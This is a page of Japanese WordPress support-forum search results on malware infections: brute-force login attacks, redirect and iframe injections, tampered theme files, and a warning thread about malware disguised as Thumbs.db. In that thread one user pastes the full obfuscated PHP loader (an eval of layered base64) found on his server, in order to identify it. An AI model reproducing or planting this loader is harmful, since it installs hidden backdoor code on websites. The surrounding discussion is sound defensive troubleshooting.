「マルウェア」の検索結果

Viewing 15 results - 46 through 60 (of 69 total)
  • トピック投稿者 gapel

    (@gapel)

    ご親切にありがとうございます。

    導入したプラグインの公式ページを確認して
    ワードプレスのバージョンアップにどこまで対応しているのかを確認するのが一番安全ですが、

    そうですかそうなりますか・・・
    ほとんどが英語サイトでしょうね・・・

    仕組み上、
    古いプラグインはどこかのタイミングで動作しなくなることはあると
    覚悟された方がよいかと思います。

    そうなんですよね・・・
    WordPressはプラグインが無いと何もできないというくらい基本機能が低く、
    プラグインを色々と入れて初めてCMSサイト、そしてSEOに強いサイトを
    作成することができる、という性格のものなんですよね・・・
    他のオープンソースCMSは同じかも知れませんが・・・

    またワードプレスは3.○の○の部分がバージョンアップする、いわゆる
    メジャーバージョンアップ時にはバージョンアップをされた方がいいかと思います。

    なるほど、メジャーバージョンアップでおこなうべきなのですね。
    ありがとうございます。

    これはセキュリティ上の問題でマルウェアなどに感染してしまう可能性が高いからです。

    ※というよりも昨年からバージョンアップを放置しているワードプレスサイトのマルウェア対応を何度もしてきた経験からの助言です・・・

    ひええ・・・マルウエアたいおうって大変そうですね・・・
    ところで、マルウェアなどに感染するとありますが、WordPressはいったいどこからマルウェア等に
    感染するんでしょうか?

    何卒宜しくお願い致します。

    gapelさん

    導入したプラグインの公式ページを確認して
    ワードプレスのバージョンアップにどこまで対応しているのかを確認するのが一番安全ですが、

    仕組み上、
    古いプラグインはどこかのタイミングで動作しなくなることはあると
    覚悟された方がよいかと思います。

    またワードプレスは3.○の○の部分がバージョンアップする、いわゆる
    メジャーバージョンアップ時にはバージョンアップをされた方がいいかと思います。

    これはセキュリティ上の問題でマルウェアなどに感染してしまう可能性が高いからです。

    ※というよりも昨年からバージョンアップを放置しているワードプレスサイトのマルウェア対応を何度もしてきた経験からの助言です・・・

    フォーラム: 使い方全般
    返信が含まれるトピック: iphone,ipadで海外サイトが表示されるマルウェア?
    トピック投稿者 tkj_tkj

    (@tkj_tkj)

    Kuraishiさま

    ありがとうございました。
    Level Warning (68 matches)の方はほぼ全て「Modified core file」という文字列が入っておりました。

    とりあえず、いったんファイルを全削除し、
    リカバリーをしてみます。

    それにしてもなぜマルウェアを埋め込まれたのかが
    分からないのが怖いですね・・・

    フォーラム: その他
    返信が含まれるトピック: wp-login.php へのアタックが多くなってきているので……

    情報ありがとうございます。あのマルウェア対策のSucuriが関連しそうなブログ記事をアップしていました。

    Brute force attacks against WordPress sites
    http://blog.sucuri.net/2012/03/brute-force-attacks-against-wordpress-sites.html

    この記事では最近増えたというニュアンスではないですね。ぼくも以前からこの手のアタックは存在した気がしますが、最近また増えてきたのでしょうか?だとしたら由々しき事態ですね。

    この手のアタックの特徴はユーザー名「admin」と「admin123」「p@ssw0rd」などの、統計的に世間で「ありがち」なパスワードを組み合わせてアクセスを試みます。いわゆる辞書攻撃というやつです。WordPressはユーザーが多いので、このような初歩的なミスを犯すユーザーでも世界中にたくさんいることと思います。ブルートフォースアタックとしてブロックされないように、わざと2秒間隔を開けるという芸の細かさです。でも2秒程度でごまかせるということはネットワーク管理者もナメられているということですかね。

    対策としては、記事中では、
    ・デフォルトの admin ユーザーを取り除く
    ・可能であればパスワードジェネレーターを使う
    ・サイトの寄稿者に管理画面へのアクセスを許している場合は、パスワードジェネレーターの使用を強制させる
    ・全てのユーザーの権限を確認し、管理者権限を持つ必要が無いユーザーからは権限を外す
    と紹介されています。

    この手法に限って言えば、admin 限定で来ていますので、無効化することは意味があります。ただし、だからといって管理者権限をもった「sub-admin」アカウントを作って、そのパスワードが「password」だったら何の意味もありません。

    個人的には、パスワードジェネレーターを使うことをまず第一の対策としてほしいなと思います。ユーザー名がバレない前提でセキュリティを考えるのは非常に危険ですし、アプリケーション側の設計としてはユーザー名がバレている前提で作られています。また、adminを削除することは利便性の面でもどうかな…と思います。

    逆に、利便性の面で長いパスワードは無理!覚えられない!という抵抗が強いのでしょうが、そういう場合はLastPassなどを使えばいいし、そもそもadminを普段から使うのはやめて、例え管理者自身であっても、記事の更新をする際は権限を制限したadmin以外のユーザーを使うべきだと思います。

    というわけで、パスワードさえ気にしていれば心配することはない、という Tai さんの意見に同意ですが、サイトの性格によってさらに対策が可能であれば検討してもいいでしょう。セキュリティ対策については、あくまで自己責任かつケース・バイ・ケースでありますので、こうすべきだということを強制はできませんが、ぜひCodexも参考にしていただきたいと思います。

    Codex : FAQ/ハッキング・クラッキング被害

    セキュリティ関係のフォーラムの書き込みには優先的に回答していますが、総じて返信が無いんですよね…。はたしてちゃんと対策してくれているのか…。

    フォーラム: 使い方全般
    返信が含まれるトピック: iphone,ipadで海外サイトが表示されるマルウェア?

    そうだ、マルウェアに感染しているかどうか Exploit Scanner でチェックするのが確実です。
    http://ja.forums.wordpress.org/topic/2743

    フォーラム: 使い方全般
    返信が含まれるトピック: iphone,ipadで海外サイトが表示されるマルウェア?

    リダイレクトされてしまう原因を切り分けるため、ブラウザのJavascriptをオフにしてアクセスしてみましょう。転送されなければ、どこかにリダイレクトのJavascriptが書いてあるのでそのコードを出力している原因を探ります。

    Javascriptを切っても転送される場合は、PHPかサーバーが原因ですが、EC CUBEでは飛ばないとのことなので、前者でしょう。お使いのantivirusプラグインとは何でしょうか…?検知できてないのではないでしょうか。ひとつのスキャン方法は、サーバー上の全ファイルをダウンロードしてマルウェアを検知できるセキュリティソフトでそれらのファイルをスキャンすることです。試してみてください。

    以前に不正なコードを埋め込まれたことがあるということですが、同じサーバー・ドメインですか?その場合、以前の感染時にブラックリストに入れられている可能性もあります。

    フォーラム: 使い方全般
    返信が含まれるトピック: footet.phpが書き換えられる(改ざんされる?)

    サイトがマルウェアに感染しているようです。まずCodexのハッキング・クラッキング被害ページ、また過去スレッドをご参照ください。
    http://ja.forums.wordpress.org/topic/8839
    http://ja.forums.wordpress.org/topic/1301

    その上で、違う要素があり解決不能であれば、ご報告ください。

    フォーラム: 使い方全般
    返信が含まれるトピック: xamppでマルウェアに感染?

    不正なコードに感染したテーマが、他のテーマのコードも書き換えてしまうのは、経験あります。マルウェアが感染しているのはテーマではないかと思います。

    まず、Timthumb Vulnerability Scannerプラグインをいれて検査してみてください。
    http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    それでも見つからなければ、プリインストールされているテーマを含む全てのテーマを配布元から再ダウンロードし、ローカルの全てのテーマのすべてのファイルを比較してみてください。

    トピック投稿者 to_fu

    (@to_fu)

    nobitaさん、ありがとうございます。

    いろいろ調べていくと、xamppで作成したオリジナルテーマがすべて感染していることがわかりました。
    ローカルに問題があるということでしょうか。

    新しくスレッドを立てましたので、見ていただけるとうれしいです。
    「xamppでマルウェアに感染?」

    こんにちは

    WordPressのコアファイルについては、マルウェアが混入している事はまずないと思いますが、プラグインやテーマファイルは、ワードプレスのコミュニティーが開発しているわけではないので、動かないものから、怪しいものまで、ネット上にはあふれています。

    プラグインを選ぶ時には、たくさんダウンロードされていて、星がいっぱいついている公式プラグインから選んだり、
    とてもかっこよいテーマでも、公式テーマから選らんで、多少のカスタマイズは自分で行う

    というような、欲望に打ち勝つ根性を養いましょう。

    しばらくは、持てる技術の総力をもって監視しましょう。

    SSHで接続できれば、変更のあったファイル一覧を表示して、改ざん監視をするとか、

    WordPressから外部にアクセスするのをしばらく禁止するとか

    define('WP_HTTP_BLOCK_EXTERNAL', true);
    define('WP_ACCESSIBLE_HOSTS','ja.wordpress.org, api.wordpress.org, wordpress.org,planet.wordpress.org','downloads.wordpress.org/');

    今まで、プラグインやテーマの編集をしていたなら、やめて、パーミッションを厳しくしたり、
    パーマリンクを変えると、自動的に.htaccessを書き換えてくれていたものをパーミッションを厳しくして、自分でコピペするとか、

    万全を期し、クラッカーが再度やってくるのを楽しみに待ちましょう。

    痕跡を見つけ、やっつけたら勉強になるし、自信もつきます。

    と、私がやっつけられた時には、そう思って、対策してました 🙂

    精神論だけで申し訳ないですが、WordPressそんなに ヘボくないですよ

    トピック投稿者 to_fu

    (@to_fu)

    nobitaさん、ありがとうございます。
    サーバーのデータをgetして、grepをかけてもコードが見当たらなかったので、
    wpをアンインストール、データは全削除したうえで、ローカルのデータをアップいたしました。

    今朝方確認したところ、Googleの再審査の結果、警告は解除されていました。

    再度、wpをインストールするのが少し怖いです。
    なぜマルウェアに感染してしまったのか、原因が知りたいです。
    マルチサイト機能を設定していたのですが、セキュリティ上関係はあるのでしょうか?
    (別スレッドで質問させていただいた方が良いですかね。。。)

    サイトがマルウェアに感染しているようです。まずCodexのハッキング・クラッキング被害ページ、また過去スレッドをご参照ください。
    http://ja.forums.wordpress.org/topic/8839
    http://ja.forums.wordpress.org/topic/1301

    その上で、違う要素があり解決不能であれば、ご報告ください。

    フォーラム: その他
    返信が含まれるトピック: 注意喚起:Thumbs.db偽装マルウェアについて
    Koji Ohashi

    (@koji-ohashi)

    nobitaさん、こんにちは。
    ご質問の件ですが…、
    改変された.htaccessは、サイトルートはじめ、その下位フォルダー内の
    もの12本が改変されていました。すべて同じタイムスタンプなのですが、
    問題の.htaccessの最終行に書かれているパスは、各々の該当のパスが
    書き込まれています。また、同じ位置に、マルウェアコードが実装された
    Thumbs.dbも存在していました(タイムスタンプは.htaccessと同じです)。
    自社内の全PCで、Thumbs.dbのチェックを実施し、問題ない事を確認しま
    したので、自社PCからアップされたとは考えづらいです。
    今回、問題となっているサイトフォルダーは、いずれも、PHPの開発ベンダー
    が担当する場所ですので、ベンダー所有PCが怪しいのかな?と思っていますが、
    確証を得るまでは…と、様子見状態です。
    情報を共有できる方がいらして大変助かっています。引き続きよろしく
    お願いします。

    フォーラム: その他
    返信が含まれるトピック: 注意喚起:Thumbs.db偽装マルウェアについて
    Koji Ohashi

    (@koji-ohashi)

    当方が管理するサーバーでも同様の事象が起こっています。マルウェアとおっしゃっているPHPコード(Thumbs.db)は以下の様な内容でしょうか?
    —————————————————————-
    <?php
    @eval(base64_decode(“aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU1NjkzKSB7ZnVuY3Rpb24gZXZhbHFLcVFJWmpRbXZIKCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9QVNmN2tTVFVOSFpDVm1hR3hrVGl4MlFzRm1kbFJDS2xSMmJqVkdaZlJqTmxOWFlpQmlieVZIZGxKM2Vna1NUVU5IWkNWbWFHeGtUaXgyUXNGbWRsUkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnNDJicFIzWXVWbloiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5VWtNWkpDSzFsWFNsTlhUQmxXU0tORmJoWlhaZzBESTNaWFVCWm5VSlYwZDBoMmNNeG1RbXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdraUk5MEVTa2htVXpNbUlvVVhlSlYyY05GVWFKcDBVc0ZtZGwxelREZG5ZR2hIWjFkR1ZDVkhSaXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09wSVNQOUUwWXdJRlNoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFo5NFVaVkZXUjFwbFpPVjBZTXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj1zVEtpMEROWEZtSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDFqVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiPXNUS2kwVFBSbGtka2RWU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZXUGh4a1p4ZDJaaEJGYTZkSFZ3UkdTUHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIj09d09kbGlJVlZUVlNoa1J3ZzFVV0JUVldsalJWVmxVR05sSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazBUZFlwM1lKVlVlUWRWUUZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI3a1NLaTBUUG5OR2I0MVdXMFpVYlZKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWmd3U0tpUWpWSHBWZEdkMVZpZ1NkNWxVWnoxVVFwbGtTVHhXWTJWR0lza2lJOWtFV2FKRGJIRm1hS2hWV21aMFZoSkNLMWxYU2xOWFRCbFdTS05GYmhaWFpnd1NLaUFUT3RGMVRPWkZWaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbEJDTHBJQ2I0SmpXMmxqTVNKQ0sxbFhTbE5YVEJsV1NLTkZiaFpYWm9rWFl5SlhZZzBESXlwMmRJeFVheWwwVkNwMFN0eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2NuZFJGa2RTbFVSM1JIYXp4RWJDWkdiaFpYWmswakxXOTBRdFptVVRWa1JoWkVhSU5VWXNwSGJoWlhaa0FTS2dzeUtwUkNJN2tESTl3RElwUkNJN0FESTlBU2FrZ0NJeTltWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbHFLcVFJWmpRbXZIKCc7KSkiN2tTS2kwVFBSWjJOcmwzWXJkV2VqQlROWHBGTTFJallxbGpSa3hHWnlnRmI0ZFZZdEpVUkpWblNZUkdNVzEyWTNJMFVMcG5VRHQwVFdoMVlWQkhNWmhtUkdkbFJzQmpZUmx6UmlobVdZcDFaMElqWXdKMU1aVm5WdXBsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxxS3FRSVpqUW12SCgnOykpIjdjbmRSRmtkU2xVUjNSSGF6eEViQ1pHYmhaWFprNGlJdUlTUHVBaVZQTlVibUoxVUZaVVlHaEdTREZHYjZ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFscUtxUUlaalFtdkgoJzspKSI9PVFmOXRqYVh4MGNRSjBTNXhXVHNGbWRsUkNJdmgyWWx0VFh4c2xhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k5QWlhWHgwY1FKMFM1eFdUc0ZtZGxSQ0k3a2lhWHgwY1FKMFM1eFdUc0ZtZGxSQ0xoeGtaeGQyWmhCRmE2ZEhWd1JHU1B4V1kyVkdKb1VHWnZ4R2M0VkdJOUFpYVh4MGNRSjBTNXhXVHNGbWRsUnllcGtTWU1aV2NuZFdZUWhtZTNSRmNraDBUc0ZtZGxSQ0xxZEZUekJsUUxsSGJOeFdZMlZHSm9JSGR6SkhkemhDSW1sMk9wa1NYcElTVk9GRFZKbGpSVlZsVUdObElvVVhlSlYyY05GVWFKcDBVc0ZtZGx0bFVGWmxVRk4xWGtnU1prOTJZdVZHYnlWbkxwSVNPbjFtU2lnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBVSFc2TldTRmxIVVhGVVJzRm1kbFJDS2xSMmJqNVdac0pYZHVraUk1a1ViS0pDSzFsWFNsTlhUQmxXU0tORmJoWlhadTBWS2kwVFNHSlZSR0JEV0dKVk1VNWtWclZsSW9VWGVKVjJjTkZVYUpwMFVzRm1kbHRsVUZabFVGTjFYazRTS2kwRE1VRm1Jb1VYZUpWMmNORlVhSnAwVXNGbWRsNVNLaTBET0VObUlvVVhlSlYyY05GVWFKcDBVc0ZtZGw1U0tpOG1RdXhrSW9VWGVKVjJjTkZVYUpwMFVzRm1kbDVpVjVkMFkwcDNTalowUUgxR1VXeFdZMlZHSnVraUk5MHpkTUpDSzFsWFNsTlhUQmxXU0tORmJoWlhadVkxVEQxbVpTTlZSR0ZtUm9oMFFoeG1lc0ZtZGxSaUxwSVNQNGtIVGlnU2Q1bFVaejFVUXBsa1NUeFdZMlZtTHBJU1A5YzJUaWdTZDVsVVp6MVVRcGxrU1R4V1kyVm1MT1ZXVmhWVWRhWm1URk5HVHNGbWRsUkNLT1ZYY1VwMFloRkZXRmwwYlE5R2JoWlhaZzBESXFkRlR6QmxRTGxIYk54V1kyVkdKZ3NUS3dBRE93RXpLcGdTWnRsR2Rza1NLaTBUVElSR2FTTnpZaWdTZDVsVVp6MVVRcGxrU1R4V1kyVkdLMVFXYnM4MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSQ0tsbDJhdjkyWTBWMmNBQnllZ1UyY3NWR0k5dEhJcGtTS2Q5MFEzSm1SNFJXZG5SbFExUmtZc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLMWhsZWpsVVI1QjFWQlZFYmhaWFprQUNMaWsyTGlBaUxna2ljcWRIU01sbWNKZGxRS3RVYnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ==”)); ?>
    —————————————————————-

    いまだ、解決策はなく、とりあえず、サイト内に存在するすべてのThumbs.db を削除し、運用しています。また、.htaccessが勝手に改ざんされ、サイト閲覧ができなくなってしまいますので、.htaccessの属性を’404’で書き換え不可にしてあります(邪道かも知れませんが…)。なにか良い対応策がありましたら、アドバイスをお願いします。

    フォーラム: 使い方全般
    返信が含まれるトピック: マルウェアのiframeリンクを削除したい

    他のテーマに変更すればマルウェアへのリンクは表示されなくなるという事でよろしいでしょうか。(以下はそのように仮定した場合の回答です)

    だとしたらお使いのテーマの functions.php あたりにリンクを組み込むコードがあるんじゃないでしょうか。ただしこの手のコードは一見しただけでは解らないように偽装されている場合があります。

    また以前はなかったはずのリンクがいつのまにか組み込まれてるというのならば、存在するセキュリティホールを改善しなければまた同じ事が起きる可能性があります。

    原因はいろいろなものが考えられますので、より万全を期するためにセキュリティに詳しい方の回答をお待ちいただくとして、さしあたっては以下の対策を行ってください。

    • お使いのPCのウィルスチェック
    • お使いのWordPressのコアファイル・プラグイン・テーマを最新版に更新する
    • サーバのFTPパスワードやWordPressのログインパスワードを変更する
Viewing 15 results - 46 through 60 (of 69 total)